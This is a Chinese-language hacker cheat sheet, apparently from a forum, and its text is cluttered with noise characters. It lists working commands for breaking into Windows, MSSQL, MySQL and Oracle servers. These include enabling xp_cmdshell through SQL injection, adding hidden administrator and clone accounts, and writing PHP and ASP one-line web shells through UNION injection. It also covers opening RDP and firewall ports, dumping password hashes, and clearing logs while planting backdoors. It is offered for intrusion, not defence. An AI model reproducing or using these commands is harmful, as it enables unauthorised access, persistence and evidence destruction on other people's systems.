- S d4 k6 o6 c7 y
1.net user administrator /passwordreq:no
* g9 a9 i. X- b5 a! _- R5 k7 f这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了- {. \) z7 z4 ?7 e$ L, M
2.比较巧妙的建克隆号的步骤
1 A* F/ a4 z# z. F先建一个user的用户! x$ e) E3 ?8 J+ x
然后导出注册表。然后在计算机管理里删掉& I! s/ l- E! s8 g9 u& H$ V/ v
在导入,在添加为管理员组
& K& ~% n5 D$ K0 M, x' Q( o3.查radmin密码: \' }/ g. k3 { K: r+ \. Q2 E
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
' j) K: ?# q: \- N4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
: U) P: ^& i7 M建立一个"services.exe"的项
* u! f5 u; ^6 ?1 _再在其下面建立(字符串值)
+ K0 O8 J- G: W9 m键值为mu ma的全路径4 U6 v* n1 q* _/ y3 A; r
5.runas /user:guest cmd
* m# b. a- C% ^% S' E- |( D( Y7 y测试用户权限!+ r$ h, a0 w) L# R9 u5 K% w
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?, ]5 T( P1 i( M9 D. y; X4 U/ @; }
7.入侵后漏洞修补、痕迹清理,后门置放:
4 t/ a* `$ r- h, t2 b; ^" K基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
1 u6 L8 }% o+ |# n. Y8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
7 m5 S1 ^8 b/ v& Z: R$ J/ d3 n/ U$ h
for example% n( _* X+ x: A. k% w+ x' p
) o1 d$ w( m6 {) B; }) F' K1 @declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add': b* x8 k" Y9 Q( Z# _
# J8 M5 }4 b& J: ^; qdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'/ n% z0 X% _- |- P- e& E6 X
) P4 k5 Z" X2 u
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了# I; P$ g, {+ Z4 u4 r
如果要启用的话就必须把他加到高级用户模式
3 i9 A/ M' }) {# S可以直接在注入点那里直接注入
' I8 Q4 M5 Y: x3 Qid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--9 i8 u+ x. H" d9 a# @1 H/ S& a1 C0 O
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--- E2 c: M/ O* j! S* _
或者
# b* H6 f7 J, Q8 z/ R& Gsp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'0 S; C- a8 a+ Z' t5 j" u
来恢复cmdshell。$ z% L: l, \! k! {
* e1 f1 U; S( x分析器
+ P6 o: ?5 X) M# q' W dEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--2 r$ z% F6 z$ [7 [6 r
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")$ v5 B6 r4 @$ `/ t0 U
10.xp_cmdshell新的恢复办法2 g2 p8 Y8 ~; I4 d& U" p% w' s
xp_cmdshell新的恢复办法
, L2 ]7 ~2 I8 F3 [9 l x+ W; g扩展储存过程被删除以后可以有很简单的办法恢复:
$ P* [* O! M8 L4 J' G! P. w0 y* n% n删除
6 N# Y$ r% e$ W0 vdrop procedure sp_addextendedproc
8 K! [0 a9 Q# L) U* I& q# adrop procedure sp_oacreate) _, R% G) _6 M% V+ t
exec sp_dropextendedproc 'xp_cmdshell'
, r% V2 w3 Y( J& W% S( N6 B. l' N# `
恢复
$ o- m I# y3 r6 i' d F3 Y- m& Sdbcc addextendedproc ("sp_oacreate","odsole70.dll")9 C1 _" ]/ @3 B( @7 m
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
3 f( n( Q$ G6 w* w
7 j2 G; W! ~" D这样可以直接恢复,不用去管sp_addextendedproc是不是存在. ~7 S" h+ t& H; k# A, `
& ?8 O; q* N4 y( n& T' k8 h Y# B- A-----------------------------# S) Z& }/ c) n8 j$ L8 w
* w f- m, U6 M8 e: A; Z& ]删除扩展存储过过程xp_cmdshell的语句:
2 x6 G" I+ c8 a2 A& ^- Jexec sp_dropextendedproc 'xp_cmdshell'1 q2 e q& q' C, ]0 l% F
1 [" S, g E% `$ e! y) M6 `+ o恢复cmdshell的sql语句
3 c' b4 J c1 a9 ~8 j( v. @7 \) zexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
& _% r4 F1 m+ {3 w7 ?- `, r3 P! d/ ^, F! T; d# h4 v% F E
9 R, h- z% l& u8 [; [. P; {: m, N
开启cmdshell的sql语句
: h+ r: l$ \8 S5 d/ n3 p; {& o# k: S" n/ x) q8 v/ E ~
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'/ M D, E8 G e0 v7 j
3 S) J, \! i- M9 _
判断存储扩展是否存在9 U% Z4 n5 w3 ^
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
. F9 }( w4 p, {; N) a6 ]返回结果为1就ok; a+ o9 K3 C# P+ [8 D
]9 ?; H3 Q! {6 R+ n, V, ]
恢复xp_cmdshell/ l& h- B* h9 e1 n
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'$ v; d- h, F d9 z+ t5 n
返回结果为1就ok
. `3 M" s- k0 V4 s; G1 k5 U- `
; R& L+ u" `) D否则上传xplog7.0.dll
2 U" n& e0 Z* x! D8 D8 b2 ]exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'. b) C( e2 R0 W Z# n; O: o1 t. Y
7 A# q% \2 @" r+ P9 D堵上cmdshell的sql语句 U+ Q4 i- L1 S$ v( L& X
sp_dropextendedproc "xp_cmdshel( j- l2 y( r' `7 @5 z; F
-------------------------
0 I3 G: b' K9 F清除3389的登录记录用一条系统自带的命令:/ o9 b* G4 \3 l5 V. F
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f7 Y! g8 M6 {! i/ r
2 b" g0 U; ^; A然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件) @9 U3 f% U5 o/ b4 T
在 mysql里查看当前用户的权限
6 X+ F8 ]+ N6 n( [ M1 p( N# O5 lshow grants for ) k1 H5 |, i7 s% J& f. H, Y
" h3 w) f- T1 F) b; U
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。6 L7 x. {" x$ V% w
% U0 x1 C5 g5 a+ k9 r) j- K
0 d$ U% P& w' mCreate USER 'itpro'@'%' IDENTIFIED BY '123';
$ E. s4 n4 @: g7 m; R' g! V4 _+ @0 u$ h5 `+ e* b/ U- H0 N9 t! u8 ~4 c' }( P* Q
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
, U+ q) U! J7 {" }" I4 |5 z3 B2 q1 d' H
6 T, w: u2 ^1 r& U; ~9 MMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
- U) v9 x P# ~
4 ?5 P5 l- T6 D5 J6 MMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
2 G. F: p/ n. s) J% p) d, d9 L4 y' I- [; w& Z& {/ U z' R
搞完事记得删除脚印哟。0 \! g8 r( c- w z3 G% e+ U A
; i7 b" Q) w7 f% m& s+ u4 p- t
Drop USER 'itpro'@'%';
1 z6 a/ w P& F+ A5 I# B1 V& [' G
; f. h9 D2 D i( n5 n- o9 ]Drop DATABASE IF EXISTS `itpro` ;
5 i4 m8 ]( j; O3 y, p9 I- z7 e3 ?8 V5 w
当前用户获取system权限& p' s- E$ @" U( \7 v2 P- ?
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
1 _9 N6 w5 V* L% ^sc start SuperCMD) f' x' b9 V7 q5 H% u
程序代码
' W* O' L; k+ j- x) L; a<SCRIPT LANGUAGE="VBScript">6 K0 B, c( j/ ?# @0 t4 p* Y3 a
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
% ?' j8 b5 `0 hos="WinNT://"&wsnetwork.ComputerName
6 X) [1 x* J1 l0 bSet ob=GetObject(os)- i6 u' s" l+ U" N. E7 w# l1 J
Set oe=GetObject(os&"/Administrators,group")
' P' f' @$ r3 F: k9 k" O5 }Set od=ob.Create("user","nosec")/ j1 H6 n! f R0 P( t" i& h
od.SetPassword "123456abc!@#"
8 K7 d3 W) v% r0 g; a6 iod.SetInfo# |' P- C+ J% }# B
Set of=GetObject(os&"/nosec",user)8 E( D: M$ d7 P* j. {
oe.add os&"/nosec"
0 H7 Q7 G( p5 Z% r6 w5 y, j</Script>. B" W7 H+ r! E* r
<script language=javascript>window.close();</script># M- L# H, F* f. _) u
6 k/ \& D' ], F" {2 I/ y4 }8 Y
, K+ w8 |+ D# }: @8 R0 d0 R) e. @4 X) }
2 y0 z0 p5 C1 @! k
突破验证码限制入后台拿shell9 c" T C2 o9 I; A* W
程序代码
6 I/ r7 L7 g( M! N" FREGEDIT4
7 y7 Q" O, g: R" f+ |, v9 \. g4 f[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] : P+ |1 F2 z5 Y
"BlockXBM"=dword:00000000! j- h, H @! {
. i$ T* x: g4 }; L$ z
保存为code.reg,导入注册表,重器IE
8 G0 U" \: M" S1 U8 J! I就可以了
! o: C# w) T% [% |* lunion写马
& H+ i$ J2 O8 X2 W8 {程序代码
# ~4 r; D% A9 H$ Q& G/ z% e4 M' |www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/* R' d- Q+ w" V
$ g7 I; H" ]' k. _6 d
应用在dedecms注射漏洞上,无后台写马
& W( i# ^3 }+ rdedecms后台,无文件管理器,没有outfile权限的时候
1 ]! t: |# {: b8 W) J( z$ ]在插件管理-病毒扫描里: T1 r+ S3 w9 d4 P. G: x
写一句话进include/config_hand.php里8 K, P/ f7 H4 b. y4 ?9 S' _) q
程序代码
$ z$ H3 a, v" X" D8 s! j8 D0 E>';?><?php @eval($_POST[cmd]);?>& ~9 b" Q" |3 e
' P" s; ], C$ y/ p j
1 c( R7 C# t4 a* ^' T9 w, i7 P如上格式
/ y& b7 l, N1 n( s
( i7 G( f [( Z8 R5 ^& e- z: voracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
' `0 r( @" @6 a* [+ J/ p! n6 \程序代码' Q8 o: A) k1 c0 B
select username,password from dba_users;
% k0 C2 o& B# \2 |' {4 X; u
% H# R" a# E: x4 |; i. F3 |. {/ t5 L4 v1 W; X0 ?
mysql远程连接用户% X% q0 \5 ~6 Q# G$ @/ Y y9 T& ]
程序代码6 k. R$ R6 T* i& U
o# V8 g* z6 S
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
Y7 a& R$ m) X9 z( tGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
" y$ U- c$ v& WMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
8 d$ [' N$ u, o& }MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
: n$ K# h9 S# S2 h W3 X
0 r6 z: `# r) V. l4 o0 z$ D% T3 S, }% J) B
& |3 c2 B: \1 F& i( [$ M: b
' U8 v, I( v7 T, f- Q! a+ r4 ?! wecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
3 ^& O% U4 ~' A7 |# d( V4 ^1 i* R. g$ N6 J" g7 h
1.查询终端端口
3 R3 T+ `' G+ V' t( J7 R4 i, ]5 {+ g/ k' q: B$ L- d+ \
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber0 V/ R2 a9 e% }' v( C: C
4 o$ w2 J2 L M& U, v, P8 O% e通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
; p8 ]1 ?$ ~- [& X: O" Stype tsp.reg- O O, h* J3 D
6 n2 {# f5 b2 } c8 V/ m2.开启XP&2003终端服务7 k+ X: M4 v5 c4 c- L
7 d# p. Q4 o; {' P: C3 A7 v2 b, A6 R2 A3 F3 w8 }+ ^* y
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f/ j& v, K l; \# n# v, [
# m' X: s6 G0 r1 F; B
( I `( U+ ?4 Y) X- J, k1 I1 S0 jREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
- C$ O- c X, j9 H( c8 O; @, i& h' b+ E( {, \
3.更改终端端口为20008(0x4E28)
! m& R/ t. W3 i0 o4 X" i
0 k# K- C7 q6 d( |$ f# b1 t6 f' AREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f/ ]( G# M1 J2 T) ^, L
3 s7 `0 o1 G% n C) p
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
0 H) [+ s D D& h5 L: \
: M& k) K d) F; O+ k4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制' u7 {2 Y% t4 K. d$ g4 Q
8 y0 s1 @! `4 i6 @: S, K
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
! l4 c1 `( S3 a8 q8 a8 \7 q, Q2 r, n+ g/ M
( B) z% s$ ^0 J6 E' z
5.开启Win2000的终端,端口为3389(需重启) R, D5 e/ B% f* h2 `7 q1 y
% L) Z7 r4 ]7 ]4 yecho Windows Registry Editor Version 5.00 >2000.reg
# @9 B8 X( B K4 k0 J' techo. >>2000.reg! \$ O4 Q& M/ s) K. J# n
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 6 H. @% r N. P# R7 O, |# O
echo "Enabled"="0" >>2000.reg
6 z4 Y: r" ?8 k! G* Pecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg ) o" Q/ n% A3 L
echo "ShutdownWithoutLogon"="0" >>2000.reg 8 l; ?! E- e G9 m* R
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
6 s( A, A2 g' U' pecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg 7 t# j- J+ R0 E6 F2 b! N# m
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg # B8 V' k, p! |
echo "TSEnabled"=dword:00000001 >>2000.reg ) q# D' R- N) L: X1 e" L. C" D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
' H3 l8 u" y# ^" b# p' j0 {echo "Start"=dword:00000002 >>2000.reg ( H2 ?: D, d2 a6 ?
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg : c1 F( M! l C1 m8 i
echo "Start"=dword:00000002 >>2000.reg
# B' i$ n p/ zecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
' C4 G+ E; o# B& l6 W- E3 l. N: cecho "Hotkey"="1" >>2000.reg ) R2 n$ Z0 y" z' i7 ^
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
; E, Y( T6 Z6 G: H5 X2 } _' s; Gecho "ortNumber"=dword:00000D3D >>2000.reg
$ M6 t, f' c5 W cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg 6 _6 W' }5 [# X
echo "ortNumber"=dword:00000D3D >>2000.reg' Z% n& n5 F" U% v2 b0 J& }. _
) U/ t9 e/ U- t( D6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
% m5 {2 F( K1 i/ c- y3 ]# u7 c. l' ~1 d- b' v# t9 I+ s5 ?4 S
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
! u! t! H- i/ g/ l(set inf=InstallHinfSection DefaultInstall)& R& w; S! n0 M' ]. b x
echo signature=$chicago$ >> restart.inf
$ ~. R: \* e! G2 r( a5 lecho [defaultinstall] >> restart.inf2 D* C( u! J" F: T; `3 a
rundll32 setupapi,%inf% 1 %temp%\restart.inf- d$ J ^7 e9 a; [* j6 n0 M2 [
) p" [6 Q' b, F( m4 x+ f/ d
9 _7 y7 c3 ]2 k( g3 ^7.禁用TCP/IP端口筛选 (需重启)
. V, e2 G! {( f+ t, W G- x: _4 x V, ?
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
6 R2 @; e0 h8 F q0 B" a' X
" O+ P( M) _7 j3 ~( h' v8.终端超出最大连接数时可用下面的命令来连接6 o; P! y) ^ m: v( f- ~ A& D
0 `* R% \2 m3 `3 l+ z$ r1 D5 z$ X
mstsc /v:ip:3389 /console! ^& f, S# E7 H6 |6 n
" B8 |( j0 m7 g" Q. ~9 B
9.调整NTFS分区权限' }: d) P T1 a' c. W3 C9 `
. f5 q! K- k7 ~$ lcacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
+ b; |; X0 C3 J. ]$ a
8 C6 _) F7 r' k% I/ ^# Ycacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
) F- O" q! h* e+ }& @
3 f w$ H$ K- H9 T% ^------------------------------------------------------
' E2 H- H* B3 M' g8 a) ^3 _3389.vbs 5 p# ^1 q, M6 X: B- W: ?
On Error Resume Next+ l+ V& P( ^, |* F
const HKEY_LOCAL_MACHINE = &H800000028 W3 l- L# d1 X
strComputer = "."+ ]/ I2 E' Y# l
Set StdOut = WScript.StdOut! i1 F4 f4 I! W6 \
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
. [* r. J* H0 s2 `6 j; F( jstrComputer & "\root\default:StdRegProv")) {+ l: G2 o* H- l" z# H
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"9 `: g' z4 [% |' Z- A
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
4 ?' n5 N- ^3 E0 b* hstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
5 M' ~5 Y) p J0 e9 Z2 t) }oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath# T' T+ @% {3 t0 K7 V' \& u, c! q
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
1 s/ e* d; ~% x3 F9 q6 P5 OstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
; r! g) {0 A1 V5 r2 Y+ k# v, nstrValueName = "fDenyTSConnections"0 }2 u! Q1 d: n* U* B
dwValue = 0' k9 [# G) b& r* ~" }* ]0 Z
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue: Q" r. |; ~! v0 i2 D
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"5 c* a- Z, K# [( z1 J5 {3 J
strValueName = "ortNumber"
1 E3 M% X7 d ^6 V% I, N/ @dwValue = 3389
% R' D2 Z0 Y6 d8 Voreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
2 V. @' u. d, l1 U, B% ?. EstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"2 o& B+ h q. k3 z
strValueName = "ortNumber"* q G; y7 ~) B
dwValue = 3389$ d+ E `! n4 J" `4 o
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue7 B+ g- f: J0 n& }; X" X
Set R = CreateObject("WScript.Shell")
7 ^. P) C8 m' G, m; [R.run("Shutdown.exe -f -r -t 0")
! I; \2 L5 [8 i, M7 ~
/ V, E6 q( O, T+ c% S C删除awgina.dll的注册表键值
, G" Y4 l* H7 ~: |$ L& U程序代码
/ e! P% O/ @( N# x. [6 w& S: x% [; Y5 k2 O
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
' A) Z8 `$ e: S) i3 [* r+ U+ z& Q& y; N+ X
# J3 X2 v+ a& {! D7 T" q2 @
. a7 _. m( r) S2 [1 d# z2 r, a1 E2 ^! K y, M @
程序代码
: H& S2 E4 ~# P4 W l( r! t/ DHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
, r( A/ q! o1 L4 ~
9 h( x; z# G {% k: q$ k/ v设置为1,关闭LM Hash0 t0 e9 g8 m" E
2 s' j# e) P1 u% a# V数据库安全:入侵Oracle数据库常用操作命令, L* z2 x. h' s9 g
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
, O: K, e9 Q' h R, S6 N1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
4 m8 W- r! m) h% {& J' X# l2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;9 ~0 X" \" n- Q. [
3、SQL>connect / as sysdba ;(as sysoper)或
9 e3 m: e4 {1 {. s$ ?( K) pconnect internal/oracle AS SYSDBA ;(scott/tiger); o: f+ {; Y# V) D! r. c+ f9 l
conn sys/change_on_install as sysdba;
# e$ g3 A6 r1 \8 {" ~& g- b2 H4、SQL>startup; 启动数据库实例% A) X3 e' A' ~- a4 i9 \
5、查看当前的所有数据库: select * from v$database;
0 B2 L% N' q4 X; H* Y8 s9 F5 Q5 Qselect name from v$database;$ f; q( H# [$ C w. X3 [/ [
6、desc v$databases; 查看数据库结构字段
+ y& D+ T1 `2 o" f, G7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:2 ^3 ^$ [: E" T+ S* W
SQL>select * from V_$PWFILE_USERS;
3 k, ~% F) d1 d% [Show user;查看当前数据库连接用户: }' e% D/ M% v: F# R3 @; @
8、进入test数据库:database test;& O' z u2 n0 \7 S( z0 o
9、查看所有的数据库实例:select * from v$instance;/ Z! \. _3 K, y
如:ora9i
/ i" R' T8 O @4 I10、查看当前库的所有数据表:
4 ^- ]# u( ?' ^9 a3 F! U- MSQL> select TABLE_NAME from all_tables;
9 C$ v; j/ X. @* l) p3 B L# {select * from all_tables;0 x$ R8 [8 M/ b5 l2 a
SQL> select table_name from all_tables where table_name like '%u%';
. E3 @7 R! v+ @) GTABLE_NAME
4 Y- C4 v- ^# ?* N4 [------------------------------
8 E7 ^5 @8 Q* I3 H$ x, G' ^" t# a_default_auditing_options_
1 c/ \6 @, e/ I4 q L2 l: g; O4 f11、查看表结构:desc all_tables;
# P- s- T% K; Z7 b* O0 t4 ?0 {) w12、显示CQI.T_BBS_XUSER的所有字段结构:4 M4 A+ S3 ?# l& o. J6 u
desc CQI.T_BBS_XUSER;+ Y; M! S- W4 \4 z q c
13、获得CQI.T_BBS_XUSER表中的记录:
: r S+ Y7 h3 |6 c4 U7 ~3 c/ R7 Sselect * from CQI.T_BBS_XUSER;: x: X4 R S( {4 s$ w0 I1 ?+ ]" a1 b
14、增加数据库用户:(test11/test)& i7 L' N) l# _/ P
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
4 J" { _% ], d g$ B15、用户授权:
) j6 U4 q% z1 ^$ ^grant connect,resource,dba to test11;
9 Y' V2 n4 D7 ~- L' x8 qgrant sysdba to test11;, v! n' X2 S, b8 L: z4 r
commit;
1 i. y0 k% O2 r* Q16、更改数据库用户的密码:(将sys与system的密码改为test.)
9 s" w X Y7 ?alter user sys indentified by test;
% b! @1 M2 P$ }$ |* Ealter user system indentified by test;" o( b: z! o6 @
& h) }% h! n8 I2 M* S9 H
applicationContext-util.xml
/ }8 }7 [$ J) t1 Y, lapplicationContext.xml
. _' S. @) y" O8 Hstruts-config.xml& ]# G `* ^4 x+ K( Y Y) A
web.xml
: x4 `% Q0 D! L- X: ]# w# Nserver.xml
, l" u: d6 K4 Y& t B+ d9 wtomcat-users.xml" K5 @0 |7 g/ L5 X: v6 `
hibernate.cfg.xml" a h' q: \+ }/ K" t
database_pool_config.xml/ a% H1 C7 F# w8 |+ a t
. I& T; J8 |: P& E% n% X
- c! e* @$ ?* M* D( ?9 S
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
9 F( D4 t' }2 C2 |/ O\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini4 N0 k: ?, b b
\WEB-INF\struts-config.xml 文件目录结构
) q% A! U# A m2 G- I; [8 v" f* _
spring.properties 里边包含hibernate.cfg.xml的名称8 e4 f5 H1 o! }
) @: {; X$ n, m2 @% l
7 r d7 a5 n, z- z q6 oC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
2 q9 X# ^) |: Q% t/ j8 b+ z9 U. I$ U/ b' g) x4 x! u2 W
如果都找不到 那就看看class文件吧。。
, r$ m% P* z5 o& x' `; x% Z4 b- G9 ^( ^4 E0 F) v, O. ?
测试1:
. z. |, s- X1 ?/ `. M; ASELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
% }0 N- s3 t2 R" k
) c! J2 {, x i9 U测试2:
1 [6 u' m: p6 O2 C- Z6 k
" V* x7 ?6 j! ^7 y7 ]0 a3 Fcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
; _2 y4 A( m$ z" y" s0 J2 U$ |$ W j4 H, K0 k" }
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--( x0 W+ }6 R+ ~) V T$ `% k5 k7 T; c
5 d: V6 f" R& p. h: l% E. gSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1/ @' T% I9 ]4 h) w1 m+ G
1 R# `% h% A8 j0 {查看虚拟机中的共享文件:2 a7 Z: N. ^5 \' W. Z1 }3 }
在虚拟机中的cmd中执行, a6 X2 o( o j0 i
\\.host\Shared Folders
$ _. s5 w2 E' X, d5 F3 B' |0 c0 T5 S) Y' Z
cmdshell下找终端的技巧
# e3 O/ ~2 g! M* W# u" g( G9 F找终端:
_1 E* L7 q! C& f: e第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
* v% R( m) r) q! K6 u 而终端所对应的服务名为:TermService + o1 \1 I7 k+ r1 S& G3 k
第二步:用netstat -ano命令,列出所有端口对应的PID值! ; T/ c" I" q% ]' c+ o2 X
找到PID值所对应的端口* O- l' q9 s3 E' i- p- V; U2 O j+ u
8 |4 d/ ?9 B7 T/ C
查询sql server 2005中的密码hash
; g5 f+ d" R- L/ {4 rSELECT password_hash FROM sys.sql_logins where name='sa'7 G) B3 J" Y7 ? A3 [% W* h& S
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
) P% q' V$ I- N: naccess中导出shell
, b/ `' x& [: D9 I! M
% k& q M& o, v# k5 Y中文版本操作系统中针对mysql添加用户完整代码:
) T7 t# q' j. z9 z
% f- y* z5 Z8 m' j9 u' Y5 Tuse test;
# K' m3 y }3 x* V4 ~create table a (cmd text);; _0 x% |8 X) l* s: Q
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
